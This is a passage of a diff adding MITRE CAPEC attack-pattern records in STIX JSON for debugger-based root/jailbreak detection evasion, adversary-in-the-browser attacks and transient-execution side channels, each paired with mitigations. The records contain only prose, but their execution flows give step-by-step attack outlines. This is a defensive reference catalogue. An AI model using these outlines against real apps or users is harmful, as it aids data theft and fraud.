originate from outside of Apple's SDK.", + "id": "course-of-action--70e9b054-c49a-4250-8674-4d37b0ae027a", + "modified": "2020-12-17T00:00:00.000Z", + "name": "coa-660-4", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "spec_version": "2.1", + "type": "course-of-action", + "x_capec_version": "3.9" + }, + { + "created": "2020-12-17T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--ad5e1d79-01e2-4822-81ba-6cd81c7049e7", + "modified": "2020-12-17T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--70e9b054-c49a-4250-8674-4d37b0ae027a", + "spec_version": "2.1", + "target_ref": "attack-pattern--fa4feb09-657b-40a0-9edd-6187b55047e3", + "type": "relationship", + "x_capec_version": "3.9" + }, + { + "created": "2020-12-17T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "An adversary inserts a debugger into the program entry point of a mobile application to modify the application binary, with the goal of evading Root/Jailbreak detection. Mobile device users often Root/Jailbreak their devices in order to gain administrative control over the mobile operating system and/or to install third-party mobile applications that are not provided by authorized application stores (e.g. Google Play Store and Apple App Store). Rooting/Jailbreaking a mobile device also provides users with access to system debuggers and disassemblers, which can be leveraged to exploit applications by dumping the application's memory at runtime in order to remove or bypass signature verification methods. This further allows the adversary to evade Root/Jailbreak detection mechanisms, which can result in execution of administrative commands, obtaining confidential data, impersonating legitimate users of the application, and more.", + "external_references": [ + { + "external_id": "CAPEC-661", + "source_name": "capec", + "url": "https://capec.mitre.org/data/definitions/661.html" + }, + { + "external_id": "CWE-489", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/489.html" + }, + { + "description": "San-Tsai Sun, Andrea Cuadros, Konstantin Beznosov, Android Rooting: Methods, Detection, and Evasion, 2019--06---17, Technische Universität Braunschweig", + "external_id": "REF-625", + "source_name": "reference_from_CAPEC", + "url": "http://lersse-dl.ece.ubc.ca/record/310/files/p3.pdf?subformat=pdfa" + }, + { + "description": "Jose Lopes, Who owns your runtime?, 2015--10---12, Nettitude Labs", + "external_id": "REF-626", + "source_name": "reference_from_CAPEC", + "url": "https://labs.nettitude.com/blog/ios-and-android-runtime-and-anti-debugging-protections/#hooking" + }, + { + "description": "Suresh Khutale, Android Root Detection Bypass by Reverse Engineering APK, 2018--03---06, InfoSec Institute", + "external_id": "REF-627", + "source_name": "reference_from_CAPEC", + "url": "https://resources.infosecinstitute.com/topic/android-root-detection-bypass-reverse-engineering-apk/" + }, + { + "description": "Manuel Egele, Christopher Kruegel, Engin Kirda, Giovanni Vigna, PiOS: Detecting Privacy Leaks in iOS Applications, 2011--02---09", + "external_id": "REF-628", + "source_name": "reference_from_CAPEC", + "url": "https://www.ndss-symposium.org/wp-content/uploads/2017/09/egel.pdf" + } + ], + "id": "attack-pattern--80649f3c-d2f3-4703-9e78-e096673a7517", + "modified": "2020-12-17T00:00:00.000Z", + "name": "Root/Jailbreak Detection Evasion via Debugging", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "spec_version": "2.1", + "type": "attack-pattern", + "x_capec_abstraction": "Detailed", + "x_capec_can_precede_refs": [ + "attack-pattern--2b8d7aaf-bd4b-424f-8df4-6d0f37b72f4b", + "attack-pattern--fa4feb09-657b-40a0-9edd-6187b55047e3" + ], + "x_capec_child_of_refs": [ + "attack-pattern--b289975f-c5e0-4d27-bf50-5937bfd02cfd" + ], + "x_capec_consequences": { + "Access_Control": [ + "Read Data (An adversary may leverage Root/Jailbreak Detection Evasion via Debugging in order to obtain sensitive information.)" + ], + "Authorization": [ + "Execute Unauthorized Commands (Through Root/Jailbreak Detection Evasion via Debugging, the adversary compromises the integrity of the application.)", + "Gain Privileges" + ], + "Confidentiality": [ + "Gain Privileges", + "Read Data (An adversary may leverage Root/Jailbreak Detection Evasion via Debugging in order to obtain sensitive information.)" + ], + "Integrity": [ + "Execute Unauthorized Commands (Through Root/Jailbreak Detection Evasion via Debugging, the adversary compromises the integrity of the application.)" + ] + }, + "x_capec_domains": [ + "Software", + "Hardware" + ], + "x_capec_example_instances": [ + "An adversary targets an iOS banking application in an attempt to compromise sensitive user data. The adversary launches the application with the iOS debugger and sets a breakpoint at the program entry point, after the application's signature has been verified. Next, the adversary dumps the memory region that contains the decrypted code from the address space of the binary. The 'Restrict' flag is then stripped from the application and the adversary resigns the application with a self-signed certificate. The application is now executed without the 'Restrict' flag, while trusting the self-signed certificate to be legitimate. However, the adversary is now able to evaded Jailbreak detection via code hooking or other methods and can glean user credentials and/or transaction details." + ], + "x_capec_execution_flow": "

Execution Flow

Explore

  1. Identify application with attack potential: The adversary searches for and identifies a mobile application that could be exploited for malicious purposes (e.g. banking, voting, or medical applications).

    2. Techniques
    Search application stores for mobile applications worth exploiting

Experiment

  1. Debug the target application: The adversary inserts the debugger into the program entry point of the mobile application, after the application's signature has been identified, to dump its memory contents.

    2. Techniques
    Insert the debugger at the mobile application's program entry point, after the application's signature has been identified.
    Dump the memory region containing the now decrypted code from the address space of the binary.

  2. Remove application signature verification methods: Remove signature verification methods from the decrypted code and resign the application with a self-signed certificate.

Exploit

  1. Execute the application and evade Root/Jailbreak detection methods: The application executes with the self-signed certificate, while believing it contains a trusted certificate. This now allows the adversary to evade Root/Jailbreak detection via code hooking or other methods.

    2. Techniques
    Optional: Hook code into the target application.
", + "x_capec_likelihood_of_attack": "Medium", + "x_capec_prerequisites": [ + "A debugger must be able to be inserted into the targeted application." + ], + "x_capec_resources_required": [ + "The adversary must have a Rooted/Jailbroken mobile device with debugging capabilities." + ], + "x_capec_skills_required": { + "High": "Knowledge about Root/Jailbreak detection and evasion techniques.", + "Medium": "Knowledge about runtime debugging." + }, + "x_capec_status": "Stable", + "x_capec_typical_severity": "Very High", + "x_capec_version": "3.9" + }, + { + "created": "2020-12-17T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "Instantiate checks within the application code that ensures debuggers are not attached.", + "id": "course-of-action--218e7e1a-8c49-418c-9bf7-f465a1ee8d93", + "modified": "2020-12-17T00:00:00.000Z", + "name": "coa-661-0", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "spec_version": "2.1", + "type": "course-of-action", + "x_capec_version": "3.9" + }, + { + "created": "2020-12-17T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--cfe13500-1996-47bc-b16c-88e763f8de3d", + "modified": "2020-12-17T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--218e7e1a-8c49-418c-9bf7-f465a1ee8d93", + "spec_version": "2.1", + "target_ref": "attack-pattern--80649f3c-d2f3-4703-9e78-e096673a7517", + "type": "relationship", + "x_capec_version": "3.9" + }, + { + "created": "2021-06-24T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "\n An adversary exploits security vulnerabilities or inherent functionalities of a web browser, in order to manipulate traffic between two endpoints.\n ", + "external_references": [ + { + "external_id": "CAPEC-662", + "source_name": "capec", + "url": "https://capec.mitre.org/data/definitions/662.html" + }, + { + "external_id": "CWE-300", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/300.html" + }, + { + "external_id": "CWE-494", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/494.html" + }, + { + "description": "Man in the Browser", + "external_id": "T1185", + "source_name": "ATTACK", + "url": "https://attack.mitre.org/wiki/Technique/T1185" + }, + { + "description": "Man-in-the-browser attack", + "source_name": "OWASP Attacks", + "url": "https://owasp.org/www-community/attacks/Man-in-the-browser_attack" + }, + { + "description": "Man-in-the-browser attack, Open Web Application Security Project (OWASP)", + "external_id": "REF-629", + "source_name": "reference_from_CAPEC", + "url": "https://owasp.org/www-community/attacks/Man-in-the-browser_attack" + }, + { + "description": "Liviu Arsene, Oil and Gas Spearphishing Campaigns Drop Agent Tesla Spyware in Advance of Historic OPEC+ Deal, 2020--04---21, Bitdefender Labs", + "external_id": "REF-630", + "source_name": "reference_from_CAPEC", + "url": "https://labs.bitdefender.com/2020/04/oil-gas-spearphishing-campaigns-drop-agent-tesla-spyware-in-advance-of-historic-opec-deal/" + }, + { + "description": "Amit Klein, Man-in-the-Mobile Attacks Single Out Android, 2012--07---10, SecurityIntelligence", + "external_id": "REF-631", + "source_name": "reference_from_CAPEC", + "url": "https://securityintelligence.com/man-in-the-mobile-attacks-single-out-android/" + }, + { + "description": "Kelly Jackson Higgins, New 'Boy In The Browser' Attacks On The Rise, 2011--02---14, Dark Reading, Informa PLC", + "external_id": "REF-632", + "source_name": "reference_from_CAPEC", + "url": "https://www.darkreading.com/risk/new-boy-in-the-browser-attacks-on-the-rise/d/d-id/1135247" + } + ], + "id": "attack-pattern--558870ad-9433-4e39-a0b0-d9b5c4691862", + "modified": "2022-09-29T00:00:00.000Z", + "name": "Adversary in the Browser (AiTB)", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "spec_version": "2.1", + "type": "attack-pattern", + "x_capec_abstraction": "Standard", + "x_capec_alternate_terms": [ + "Man in the Browser", + "Boy in the Browser", + "Man in the Mobile" + ], + "x_capec_can_follow_refs": [ + "attack-pattern--0123fa83-2d47-4398-85f1-30ce114abb9a", + "attack-pattern--482cb9fc-0122-49f0-b6df-6d2d42098b0a" + ], + "x_capec_child_of_refs": [ + "attack-pattern--38964770-4f39-4191-89cf-73a625162b2b" + ], + "x_capec_consequences": { + "Access_Control": [ + "Gain Privileges" + ], + "Authorization": [ + "Gain Privileges" + ], + "Confidentiality": [ + "Gain Privileges", + "Read Data" + ], + "Integrity": [ + "Modify Data" + ] + }, + "x_capec_domains": [ + "Communications", + "Software" + ], + "x_capec_example_instances": [ + "\n An adversary conducts a phishing attack and tricks a victim into installing a malicious browser plugin. The adversary then positions themself between the victim and their banking institution. The victim begins by initiating a funds transfer from their personal savings to their personal checking account. Using injected JavaScript, the adversary captures this request and modifies it to transfer an increased amount of funds to an account that they controls, before sending it to the bank. The bank processes the transfer and sends the confirmation notice back to the victim, which is instead intercepted by the adversary. The adversary modifies the confirmation to reflect the original transaction details and sends this modified message back to the victim. Upon receiving the confirmation, the victim assumes the transfer was successful and is unaware that their money has just been transferred to the adversary.\n ", + "\n In 2020, the Agent Tesla malware was leveraged to conduct AiTB attacks against organizations within the gas, oil, and other energy sectors. The malware was delivered via a spearphishing campaign and has the capability to form-grab, keylog, copy clipboard data, extract credentials, and capture screenshots. [REF-630]\n ", + "\n Boy in the browser attacks are a subset of AiTB attacks. Similar to AiTB attacks, the adversary must first trick the victim into installing a Trojan, either via social engineering or drive-by-download attacks. The malware then modifies the victim's \"hosts\" file in order to reroute web traffic from an intended website to an adversary-controlled website that mimics the legitimate website. The adversary is now able to observe, intercept, and/or modify all traffic, as in a traditional Adversary in the Middle attack (CAPEC-94). BiTB attacks are low-cost, easy to execute, and more difficult to detect since the malware often removes itself once the attack has concluded. [REF-631]\n ", + "\n Man in the Mobile attacks are a subset of AiTB attacks that target mobile device users. Like AiTB attacks, an adversary convinces a victim to install a Trojan mobile application on their mobile device, often under the guise of security. Once the victim has installed the application, the adversary can capture all SMS traffic to bypass SMS-based out-of-band authentication systems. [REF-632]\n " + ], + "x_capec_execution_flow": "

Execution Flow

Experiment

  1. The adversary tricks the victim into installing the Trojan Horse malware onto their system.

    2. Techniques
    Conduct phishing attacks, drive-by malware installations, or masquerade malicious browser extensions as being legitimate.

  2. The adversary inserts themself into the communication channel initially acting as a routing proxy between the two targeted components.

Exploit

  1. The adversary observes, filters, or alters passed data of their choosing to gain access to sensitive information or to manipulate the actions of the two target components for their own purposes.

", + "x_capec_extended_description": "\n This attack first requires the adversary to trick the victim into installing a Trojan Horse application on their system, such as a malicious web browser plugin, which the adversary then leverages to mount the attack. The victim interacts with a web application, such as a banking website, in a normal manner and under the assumption that the connection is secure. However, the adversary can now alter and/or reroute traffic between the client application (e.g., web browser) and the coinciding endpoint, while simultaneously displaying intended transactions and data back to the user. The adversary may also be able to glean cookies, HTTP sessions, and SSL client certificates, which can be used to pivot into an authenticated intranet. Identifying AITB is often difficult because these attacks are successful even when security mechanisms such as SSL/PKI and multifactor authentication are present, since they still function as intended during the attack.\n ", + "x_capec_likelihood_of_attack": "High", + "x_capec_prerequisites": [ + "The adversary must install or convince a user to install a Trojan.", + "There are two components communicating with each other.", + "An attacker is able to identify the nature and mechanism of communication between the two target components.", + "Strong mutual authentication is not used between the two target components yielding opportunity for adversarial interposition.", + "For browser pivoting, the SeDebugPrivilege and a high-integrity process must both exist to execute this attack." + ], + "x_capec_skills_required": { + "Medium": "Tricking the victim into installing the Trojan is often the most difficult aspect of this attack. Afterwards, the remainder of this attack is fairly trivial." + }, + "x_capec_status": "Stable", + "x_capec_typical_severity": "Very High", + "x_capec_version": "3.9" + }, + { + "created": "2021-06-24T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "Ensure software and applications are only downloaded from legitimate and reputable sources, in addition to conducting integrity checks on the downloaded component.", + "id": "course-of-action--859f45e5-d798-477e-a3e4-381e7e492621", + "modified": "2022-09-29T00:00:00.000Z", + "name": "coa-662-0", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "spec_version": "2.1", + "type": "course-of-action", + "x_capec_version": "3.9" + }, + { + "created": "2021-06-24T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--17c99f05-562d-4662-b800-5617b6dc75c6", + "modified": "2022-09-29T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--859f45e5-d798-477e-a3e4-381e7e492621", + "spec_version": "2.1", + "target_ref": "attack-pattern--558870ad-9433-4e39-a0b0-d9b5c4691862", + "type": "relationship", + "x_capec_version": "3.9" + }, + { + "created": "2021-06-24T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "Leverage anti-malware tools, which can detect Trojan Horse malware.", + "id": "course-of-action--4f258dff-bfd4-4ad4-adcf-d01b6127a826", + "modified": "2022-09-29T00:00:00.000Z", + "name": "coa-662-1", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "spec_version": "2.1", + "type": "course-of-action", + "x_capec_version": "3.9" + }, + { + "created": "2021-06-24T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--8a77f1a6-7693-45ea-96fd-c6e1510943e8", + "modified": "2022-09-29T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--4f258dff-bfd4-4ad4-adcf-d01b6127a826", + "spec_version": "2.1", + "target_ref": "attack-pattern--558870ad-9433-4e39-a0b0-d9b5c4691862", + "type": "relationship", + "x_capec_version": "3.9" + }, + { + "created": "2021-06-24T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "Use strong, out-of-band mutual authentication to always fully authenticate both ends of any communications channel.", + "id": "course-of-action--2253f0de-f33b-47c7-9d12-daf69e74fca2", + "modified": "2022-09-29T00:00:00.000Z", + "name": "coa-662-2", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "spec_version": "2.1", + "type": "course-of-action", + "x_capec_version": "3.9" + }, + { + "created": "2021-06-24T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--7656220c-0e2c-4110-8dbf-66fc149793c2", + "modified": "2022-09-29T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--2253f0de-f33b-47c7-9d12-daf69e74fca2", + "spec_version": "2.1", + "target_ref": "attack-pattern--558870ad-9433-4e39-a0b0-d9b5c4691862", + "type": "relationship", + "x_capec_version": "3.9" + }, + { + "created": "2021-06-24T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "Limit user permissions to prevent browser pivoting.", + "id": "course-of-action--d05b5efb-6c41-4e16-ae25-d9f1c265cde9", + "modified": "2022-09-29T00:00:00.000Z", + "name": "coa-662-3", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "spec_version": "2.1", + "type": "course-of-action", + "x_capec_version": "3.9" + }, + { + "created": "2021-06-24T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--09188a1e-a0b1-4dd9-bd8f-743e97847140", + "modified": "2022-09-29T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--d05b5efb-6c41-4e16-ae25-d9f1c265cde9", + "spec_version": "2.1", + "target_ref": "attack-pattern--558870ad-9433-4e39-a0b0-d9b5c4691862", + "type": "relationship", + "x_capec_version": "3.9" + }, + { + "created": "2021-06-24T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "Ensure browser sessions are regularly terminated and when their effective lifetime ends.", + "id": "course-of-action--8735f337-fdd4-460a-a86f-cbd9b0069176", + "modified": "2022-09-29T00:00:00.000Z", + "name": "coa-662-4", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "spec_version": "2.1", + "type": "course-of-action", + "x_capec_version": "3.9" + }, + { + "created": "2021-06-24T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--67a5c853-3f88-42c9-836f-4737587b3cb1", + "modified": "2022-09-29T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--8735f337-fdd4-460a-a86f-cbd9b0069176", + "spec_version": "2.1", + "target_ref": "attack-pattern--558870ad-9433-4e39-a0b0-d9b5c4691862", + "type": "relationship", + "x_capec_version": "3.9" + }, + { + "created": "2021-06-24T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "An adversary exploits a hardware design flaw in a CPU implementation of transient instruction execution to expose sensitive data and bypass/subvert access control over restricted resources. Typically, the adversary conducts a covert channel attack to target non-discarded microarchitectural changes caused by transient executions such as speculative execution, branch prediction, instruction pipelining, and/or out-of-order execution. The transient execution results in a series of instructions (gadgets) which construct covert channel and access/transfer the secret data.", + "external_references": [ + { + "external_id": "CAPEC-663", + "source_name": "capec", + "url": "https://capec.mitre.org/data/definitions/663.html" + }, + { + "external_id": "CWE-1037", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/1037.html" + }, + { + "external_id": "CWE-1303", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/1303.html" + }, + { + "external_id": "CWE-1264", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/1264.html" + }, + { + "description": "Paul Kocher, Jann Horn, Anders Fogh, Daniel Genkin, Daniel Gruss, Werner Haas, Mike Hamburg, Moritz Lipp, Stefan Mangard, Thomas Prescher, Michael Schwarz, Yuval Yarom, Spectre Attacks: Exploiting Speculative Execution, 2019, Graz University of Technology", + "external_id": "REF-637", + "source_name": "reference_from_CAPEC", + "url": "https://spectreattack.com/spectre.pdf" + }, + { + "description": "Moritz Lipp, Michael Schwarz, Daniel Gruss, Thomas Prescher, Werner Haas, Anders Fogh, Jann Horn, Stefan Mangard, Paul Kocher, Daniel Genkin, Yuval Yarom, Mike Hamburg, Meltdown: Reading Kernel Memory from User Space, 2018, Graz University of Technology", + "external_id": "REF-638", + "source_name": "reference_from_CAPEC", + "url": "https://meltdownattack.com/meltdown.pdf" + }, + { + "description": "Claudio Canella, Jo Van Bulck, Michael Schwarz, Moritz Lipp, Benjamin von Berg, Philipp Ortner, Frank Piessens, Dmitry Evtyushkin, Daniel Gruss, A Systematic Evaluation of Transient Execution Attacks and Defenses, 2019--05---15, Graz University of Technology", + "external_id": "REF-639", + "source_name": "reference_from_CAPEC", + "url": "https://arxiv.org/abs/1811.05441" + }, + { + "description": "Qian Ge, Yuval Yarom, Gernot Heiser, A Survey of Microarchitectural Timing Attacks and Countermeasures on Contemporary Hardware, 2016--12---26, Journal of Cryptographic Engineering", + "external_id": "REF-640", + "source_name": "reference_from_CAPEC", + "url": "https://eprint.iacr.org/2016/613.pdf" + }, + { + "description": "Nael Abu-Ghazaleh, Dmitry Ponomarev, Dmitry Evtyushkin, How the Spectre and Meltdown Hacks Really Worked, 2019--02---28, IEEE Spectrum", + "external_id": "REF-641", + "source_name": "reference_from_CAPEC", + "url": "https://spectrum.ieee.org/computing/hardware/how-the-spectre-and-meltdown-hacks-really-worked" + }, + { + "description": "James Sanders, Spectre and Meltdown explained: A comprehensive guide for professionals, 2019--05---15, TechRepublic", + "external_id": "REF-642", + "source_name": "reference_from_CAPEC", + "url": "https://spectrum.ieee.org/computing/hardware/how-the-spectre-and-meltdown-hacks-really-worked" + }, + { + "description": "Alert (TA18-004A) Meltdown and Spectre Side-Channel Vulnerability Guidance, 2018--01---04, CISA", + "external_id": "REF-643", + "source_name": "reference_from_CAPEC", + "url": "https://us-cert.cisa.gov/ncas/alerts/TA18-004A" + } + ], + "id": "attack-pattern--efbf3dcf-9f19-45de-9f49-caa87fd34681", + "modified": "2022-02-22T00:00:00.000Z", + "name": "Exploitation of Transient Instruction Execution", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "spec_version": "2.1", + "type": "attack-pattern", + "x_capec_abstraction": "Standard", + "x_capec_can_precede_refs": [ + "attack-pattern--e244a53a-8c69-462c-8ff2-900a839d48cb" + ], + "x_capec_child_of_refs": [ + "attack-pattern--649abc91-f615-4c9e-91c9-9e66131e2d78", + "attack-pattern--582f33d6-0aa7-4f34-a91e-d767a65adad1" + ], + "x_capec_consequences": { + "Access_Control": [ + "Bypass Protection Mechanism" + ], + "Authorization": [ + "Execute Unauthorized Commands" + ], + "Confidentiality": [ + "Read Data" + ] + }, + "x_capec_domains": [ + "Software", + "Hardware", + "Software" + ], + "x_capec_example_instances": [ + "\n A web browser with user-privileges executes JavaScript code imbedded within a malicious website. The system does not disable shared buffers for the web browser and there is no restriction or check upon user-process execution of flush or evict instructions. The Javascript code executes vulnerable transient instructions upon system to cause microarchitectural changes that establish covert channel and transfer sensitive/secret data into shared cache from address space of either kernel, web browser or another executing process on the system.\n " + ], + "x_capec_execution_flow": "

Execution Flow

Explore

  1. Survey target application and relevant OS shared code libraries: Adversary identifies vulnerable transient instruction sets and the code/function calls to trigger them as well as instruction sets or code fragments (gadgets) to perform attack.

    2. Techniques
    Utilize Disassembler and Debugger tools to examine and trace instruction set execution of source code and shared code libraries on a system.

  2. Explore cache and identify impacts: Utilize tools to understand the impact of transient instruction execution upon address spaces and CPU operations.

    3. Techniques
    Run OS or application specific tools that examine the contents of cache.

Experiment

  1. Cause conditions for identified transient instruction set execution: Adversary ensures that specific code/instructions of the target process are executed by CPU, so desired transient instructions are executed.

  2. Cause specific secret data to be cached from restricted address space: Executed instruction sets (gadgets) in target address space, initially executed via adversary-chosen transient instructions sets, establish covert channel and transfer secret data across this channel to cache.

    3. Techniques
    Prediction-based - adversary trains CPU to incorrectly predict/speculate conditions for instruction execution to be true, hence executing adversary-chosen transient instructions. These prediction-based methods include: Pattern History Table (PHT)/Input Validation Bypass, Branch Target Buffer (BTB)/Branch Target Injection, Return Stack Buffer (RSB)/Return Address Injection, and Store To Load (STL)/Speculative Store Bypass.
    Exception/Fault-based - adversary has CPU execute transient instructions that raise an exception allowing inaccessible memory space to be accessed via out-of-order execution. These exception/fault-based methods include: Supervisor-only Bypass, Virtual Translation Bypass, System Register Bypass, FPU Register Bypass, Read-only Bypass, Protection Key Bypass, and Bounds Check Bypass.

Exploit

  1. Perform covert channel attack to obtain/access secret data: Adversary process code removes instructions/data from shared cache set, waits for target process to reinsert them back into cache, to identify location of secret data via a timing method. Adversary continuously repeat this process to identify and access entirety of targeted secret data.

    2. Techniques
    Flush+Reload - adversary frequently flushes targeted memory cache line using a dedicated machine flush instruction, and uses another process to measure time taken for CPU to load victim secret data.
    Evict+Time - adversary causes victim to load target set into cache and measures time for victim process to load this data, setting a baseline. Adversary evicts a specified cache line and causes victim process to execute again, and measures any change in execution time, to determine if cache line was accessed.
    Prime+Probe - adversary primes cache by filling cache line(s) or set(s) with data, after some time victim process evicts this adversary data to replace it with secret data. The adversary then probes/accesses all the previously accessed cache lines detecting cache misses, which determine that their attacker data has been evicted and replaced with secret data from victim process.
", + "x_capec_likelihood_of_attack": "Low", + "x_capec_parent_of_refs": [ + "attack-pattern--faa02de4-0f9b-4881-a088-b2a4d64475fd" + ], + "x_capec_peer_of_refs": [ + "attack-pattern--c727c058-2c9d-4021-a1ec-81dd030dea59", + "attack-pattern--d5e0c12f-6086-491d-86e5-e10a14d1f947", + "attack-pattern--aac17300-6cdd-4f50-82c3-da5a01d225ac" + ], + "x_capec_prerequisites": [ + "The adversary needs at least user execution access to a system and a maliciously crafted program/application/process with unprivileged code to misuse transient instruction set execution of the CPU." + ], + "x_capec_resources_required": [ + "C2C mechanism or direct access to victim system, capable of dropping malicious program and collecting covert channel attack data.", + "Malicious program capable of triggering execution of transient instructions or vulnerable instruction sequences of victim program and performing a covert channel attack to gather data from victim process memory space. Ultimately, the speed with which an attacker discovers a secret is directly proportional to the computational resources of the victim machine." + ], + "x_capec_skills_required": { + "High": "Detailed knowledge on compiled binaries and operating system shared libraries of instruction sequences, and layout of application and OS/Kernel address spaces for data leakage." + }, + "x_capec_status": "Stable", + "x_capec_typical_severity": "Very High", + "x_capec_version": "3.9" + }, + { + "created": "2021-06-24T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "Implementation: DAWG (Dynamically Allocated Way Guard) - processor cache properly divided between different programs/processes that don't share resources", + "id": "course-of-action--b9126a5e-0a53-42a6-9605-92e09bea13d2", + "modified": "2022-02-22T00:00:00.000Z", + "name": "coa-663-0", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "spec_version": "2.1", + "type": "course-of-action", + "x_capec_version": "3.9" + }, + { + "created": "2021-06-24T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--8ff9f578-79d5-4352-a475-1b33b37b07a7", + "modified": "2022-02-22T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--b9126a5e-0a53-42a6-9605-92e09bea13d2", + "spec_version": "2.1", + "target_ref": "attack-pattern--efbf3dcf-9f19-45de-9f49-caa87fd34681", + "type": "relationship", + "x_capec_version": "3.9" + }, + { + "created": "2021-06-24T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "Implementation: KPTI (Kernel Page-Table Isolation) to completely separate user-space and kernel space page tables", + "id": "course-of-action--58b2d339-c160-4d96-b0fa-3e4dba290713", + "modified": "2022-02-22T00:00:00.000Z", + "name": "coa-663-1", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "spec_version": "2.1", + "type": "course-of-action", + "x_capec_version": "3.9" + }, + { + "created": "2021-06-24T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--fbff3867-2c77-46ca-911a-4348a280a4bb", + "modified": "2022-02-22T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--58b2d339-c160-4d96-b0fa-3e4dba290713", + "spec_version": "2.1", + "target_ref": "attack-pattern--efbf3dcf-9f19-45de-9f49-caa87fd34681", + "type": "relationship", + "x_capec_version": "3.9" + }, + { + "created": "2021-06-24T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "Configuration: Architectural Design of Microcode to limit abuse of speculative execution and out-of-order execution", + "id": "course-of-action--3f5fcaf8-e704-4973-b9d1-748021eb261f", + "modified": "2022-02-22T00:00:00.000Z", + "name": "coa-663-2", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "spec_version": "2.1", + "type": "course-of-action", + "x_capec_version": 